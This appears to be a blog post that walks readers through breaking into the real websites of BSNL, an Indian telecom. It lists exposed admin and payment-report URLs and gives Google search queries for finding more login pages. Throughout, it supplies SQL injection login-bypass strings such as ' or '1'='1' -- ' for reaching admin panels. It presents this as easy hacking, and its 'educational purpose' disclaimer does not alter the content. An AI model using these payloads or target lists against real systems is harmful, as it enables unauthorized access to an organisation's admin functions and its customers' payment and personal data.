Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.
Yes , we shall hack bsnl website easily , easy enough for a nursery kid. We shall be using Google Hacking and SQL Injection techniques.
So Lets begin.
Search this in google :
inurl:bsnl.co.in/admin
In the search results page go to second page. You would see plenty of links of the type :
Open that link and you will see lots of source code files.
Many of the links on this page show good information like :
Payment information – http://www.billchn.bsnl.co.in/admin/consol.jsp
Transaction information – http://www.billchn.bsnl.co.in/admin/consolidatedreport.jsp
Registered user page – http://www.billchn.bsnl.co.in/admin/registereduser.jsp
Even an administration page is available without login :
http://billchn.bsnl.co.in/modifypassword.jsp
http://billchn.bsnl.co.in/modifypassword.jsp
and here :
Check out what can be hacked from there.
So you hacked into bsnl servers and found some information that should be password protected. If you are a creative hacker then try getting into the system with a proper login.
This is the login page :
http://www.billchn.bsnl.co.in/adminlogin.html
http://www.billchn.bsnl.co.in/adminlogin.html
Another google hack term :
site:bsnl.co.in inurl:admin
Search the above and you might get some more interesting links like :
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=admin
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_17&selected_faculty=DE+ADMIN
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=DE+ADMIN
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_5&selected_faculty=admin
The above links appear to be : should have been password protected but they are publicly visible.
Want to hack more ?
Search for this :
site:bsnl.co.in inurl:login
and you will find urls like :
all the above urls are vulnerable to sql injection. Enter the following as both username and password :
‘ or ’1′=’1
and you should be logged in. Happy Hacking!!
Try this url :
http://udaan.bsnl.co.in/
http://udaan.bsnl.co.in/
with username/password as :
‘ or ’1′=’1′ — ‘
Here is a screenshot :
Want to hack more ? Still not satisfied ? OK
Open this url :
and login with
‘ or ’1′=’1′ — ‘
as username and password , and you would be logged in as admin. Here is a screenshot :
Funny isn’t it ?
Want another website ? Sure :
Login with :
‘ or ’1′=’1′ — ‘
as the username and abcd as the password. You should get logged in and the Administration Panel should be available.
Here is a screenshot :
Well done once again Bsnl!!
References :
1. SQL Injection Tutorial : http://en.wikipedia.org/wiki/SQL_injection
Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.
Very nice
ReplyDelete